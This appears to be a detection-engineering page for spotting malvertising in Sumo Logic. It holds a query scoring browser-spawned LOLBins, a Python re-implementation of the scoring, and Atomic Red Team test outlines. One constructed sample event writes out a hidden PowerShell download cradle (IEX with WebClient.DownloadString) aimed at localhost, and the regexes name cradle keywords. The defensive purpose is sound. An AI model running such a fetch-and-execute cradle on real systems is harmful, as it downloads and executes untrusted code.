T1583.008 Sumo Logic CSE · Sumo

Detect Malvertising in Sumo Logic CSE

Adversaries may purchase online advertisements to distribute malware to victims. Ads can be positioned prominently in search results or on popular websites, exploiting user trust in those platforms. Malvertising campaigns frequently spoof legitimate software vendors, tricking users into downloading trojanized installer packages. Because the adversary's infrastructure purchase occurs entirely outside the victim environment, detection must pivot to observable victim-side indicators: browsers spawning unexpected child processes, executable file downloads staged in user-writable directories, and drive-by script execution patterns consistent with clicking a malicious ad.

MITRE ATT&CK

Tactic
Resource Development
Technique
T1583 Acquire Infrastructure
Sub-technique
T1583.008 Malvertising
Canonical reference
https://attack.mitre.org/techniques/T1583/008/

Sumo Detection Query

Sumo Logic CSE (Sumo)

_sourceCategory="os/windows/sysmon" OR _sourceCategory="os/windows/security"
| where EventID = "1" OR EventID = "4688"
// Pull the process fields out of the raw event; Sumo uses Java-style (?<name>) capture groups
| parse regex field=_raw "(?i)ParentImage[=:]\s*(?:[^\"\s]*\\\\)?(?<parent_image>[^\\\"\s\r\n]+)" nodrop
| parse regex field=_raw "(?i)(?:Image|NewProcessName)[=:]\s*(?:[^\"\s]*\\\\)?(?<child_image>[^\\\"\s\r\n]+)" nodrop
| parse regex field=_raw "(?i)(?:CommandLine|ProcessCommandLine)[=:]\s*(?<command_line>[^\r\n]+)" nodrop
| parse regex field=_raw "(?i)(?:CurrentDirectory|WorkingDirectory)[=:]\s*(?<working_dir>[^\r\n]+)" nodrop
// Browser parent spawning a script host, installer or download-capable LOLBin
| where (parent_image matches /(?i)(chrome|msedge|firefox|iexplore|opera|brave)\.exe/)
| where (child_image matches /(?i)(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|msiexec|certutil|bitsadmin)\.exe/)
// Four boolean risk factors; Sumo expresses eval as `| if(cond, a, b) as field`
| if(working_dir matches /(?i)(\\Downloads\\|\\Temp\\|AppData\\Local\\Temp)/, 1, 0) as DownloadPath
| if(command_line matches /(?i)(http:\/\/|https:\/\/|ftp:\/\/)/, 1, 0) as NetworkRef
| if(command_line matches /(?i)(-enc|-encodedcommand|\biex\b|downloadstring|downloadfile|webclient|invoke-webrequest)/, 1, 0) as EncodedOrDL
| if(command_line matches /(?i)(-windowstyle\s+hidden|-w\s+hidden|\/quiet|\/silent|\/verysilent)/, 1, 0) as HiddenOrSilent
// Every browser->LOLBin spawn scores at least 1; each factor adds 1
| DownloadPath + NetworkRef + EncodedOrDL + HiddenOrSilent + 1 as SuspicionScore
| fields _messageTime, _sourceHost, parent_image, child_image, command_line, working_dir, DownloadPath, NetworkRef, EncodedOrDL, HiddenOrSilent, SuspicionScore
| sort by SuspicionScore desc, _messageTime desc

Severity
high
Confidence
medium

Sumo Logic query targeting Sysmon Event ID 1 and Security Event ID 4688 log sources to detect browser processes spawning suspicious child processes indicative of malvertising. Regex-based field extraction pulls parent image, child image, command line, and working directory from raw XML event data. Four boolean risk factors are evaluated and summed into a suspicion score, matching the reference KQL/SPL triage logic. Results are sorted by score for analyst prioritisation.
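To check the triage logic against known-shape events before the query is deployed, here is the same browser-parent/LOLBin-child filter and four-factor score re-implemented in Python over constructed Sysmon-style records. This is an added example, not part of the page's query or of Sumo Logic's tooling; the key/value rendering of the event, the user name and the installer file name are assumptions. The third record has the shape of Test 1 below (ParentImage=cmd.exe), which the browser filter deliberately does not match.

```python
import re
# Same filters as the Sumo query, in Python re syntax (added example; not Sumo code).
BROWSER = re.compile(r"(?i)(chrome|msedge|firefox|iexplore|opera|brave)\.exe$")
LOLBIN = re.compile(r"(?i)(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|msiexec|certutil|bitsadmin)\.exe$")
FACTORS = {  # factor -> (event field, regex); each match adds 1 to SuspicionScore
    "DownloadPath": ("cwd", re.compile(r"(?i)(\\Downloads\\|\\Temp\\|AppData\\Local\\Temp)")),
    "NetworkRef": ("cmd", re.compile(r"(?i)(https?://|ftp://)")),
    "EncodedOrDL": ("cmd", re.compile(r"(?i)(-enc|-encodedcommand|\biex\b|downloadstring|downloadfile|webclient|invoke-webrequest)")),
    "HiddenOrSilent": ("cmd", re.compile(r"(?i)(-windowstyle\s+hidden|-w\s+hidden|/quiet|/silent|/verysilent)")),
}

def _field(raw, *names):
    """Value of the first 'Name: value' line found in a key/value-rendered event, else ''."""
    for name in names:
        m = re.search(rf"(?im)^{name}:\s*(.*?)\s*$", raw)
        if m:
            return m.group(1)
    return ""

def score_event(raw):
    """Risk factors plus SuspicionScore for one event, or None if the browser->LOLBin filter fails."""
    parent = _field(raw, "ParentImage").rsplit("\\", 1)[-1]          # basename, like the query's regex
    child = _field(raw, "Image", "NewProcessName").rsplit("\\", 1)[-1]
    if not (BROWSER.search(parent) and LOLBIN.search(child)):
        return None
    values = {"cmd": _field(raw, "CommandLine", "ProcessCommandLine"),
              "cwd": _field(raw, "CurrentDirectory", "WorkingDirectory")}
    hit = {"parent_image": parent, "child_image": child}
    for factor, (field, rx) in FACTORS.items():
        hit[factor] = int(bool(rx.search(values[field])))
    hit["SuspicionScore"] = sum(hit[f] for f in FACTORS) + 1   # +1 for any browser->LOLBin spawn
    return hit

def triage(events):
    """Score all events and order hits like the query's 'sort by SuspicionScore desc'."""
    return sorted((h for h in map(score_event, events) if h), key=lambda h: -h["SuspicionScore"])

def _event(image, cmd, cwd, parent):  # renders one constructed Sysmon Event ID 1 record
    return f"Image: {image}\nCommandLine: {cmd}\nCurrentDirectory: {cwd}\nParentImage: {parent}"

SAMPLE_EVENTS = [  # constructed sample telemetry, not real events
    _event("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",  # download cradle under Edge
           "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:18080/x')",
           "C:\\Users\\alice\\AppData\\Local\\Temp\\", "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"),
    _event("C:\\Windows\\System32\\msiexec.exe", "msiexec.exe /i 7zip-setup.msi /quiet",  # silent install from Downloads
           "C:\\Users\\alice\\Downloads\\", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"),
    _event("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "powershell -WindowStyle Hidden Write-Output t",
           "C:\\Users\\alice\\AppData\\Local\\Temp\\", "C:\\Windows\\System32\\cmd.exe"),  # Test 1 shape: parent is cmd.exe
    _event("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "chrome.exe --type=renderer",
           "C:\\Users\\alice\\", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"),  # benign helper process
]
```

Running `triage(SAMPLE_EVENTS)` returns two hits, the Edge download cradle scored 5 ahead of the silent installer scored 3; the cmd.exe-parented and browser-helper records are filtered out before scoring.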

Data Sources

Windows Sysmon
Windows Security Event Log

Required Tables

_sourceCategory=os/windows/sysmon
_sourceCategory=os/windows/security

False Positives & Tuning

  • Browser-based single sign-on (SSO) flows that trigger Windows installer processes, particularly when enterprise software is provisioned via an internal web portal that calls msiexec.exe silently.
  • Automated browser testing frameworks (Selenium Grid, Playwright on Windows CI agents) where the test runner parent is a browser process and helper scripts are cmd.exe or powershell.exe.
  • Built-in browser download-and-run prompts for legitimate software (e.g., Zoom, Teams client updates) where the browser directly spawns the installer in the Downloads folder.

Testing Methodology

Validate this detection against the four Atomic Red Team test cases below. Each test lists the behaviour to exercise and the telemetry you should expect to see.

  1. Test 1: Simulate Browser Spawning PowerShell (Malvertising Drive-by Pattern)

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, ParentImage=cmd.exe, CommandLine containing '-WindowStyle Hidden'. Sysmon Event ID 11: File Create for malv-test.txt in Temp. Security Event ID 4688 (if command line auditing enabled). PowerShell ScriptBlock Log Event ID 4104 showing Write-Output command.

  2. Test 2: Stage and Execute Trojanized Installer from Downloads Folder

    Expected signal: Sysmon Event ID 11: File Create for 7zip-2400-x64.exe in the Downloads folder. Sysmon Event ID 1: Process Create with Image path inside the Downloads folder — anomalous for any legitimate software. Security Event ID 4688 if command line auditing is enabled.

  3. Test 3: HTA Drive-by Execution Simulating Malvertising Redirect

    Expected signal: Sysmon Event ID 1: Process Create for mshta.exe with TargetFilename in Temp path. Sysmon Event ID 11: File Create for hta-atomic.txt. Security Event ID 4688 for mshta.exe execution. If launched from a browser parent, the main detection fires on mshta.exe as a SuspiciousChild with DownloadPath=1.

  4. Test 4: PowerShell Download Cradle Spawned from Browser Context (Simulated Raspberry Robin Pattern)

    Expected signal: Sysmon Event ID 1: Process Create for powershell.exe, ParentImage=cmd.exe, CommandLine containing 'Net.WebClient' and 'DownloadString'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:18080 (connection refused, but event still fires). PowerShell ScriptBlock Log Event ID 4104 showing the download cradle code.
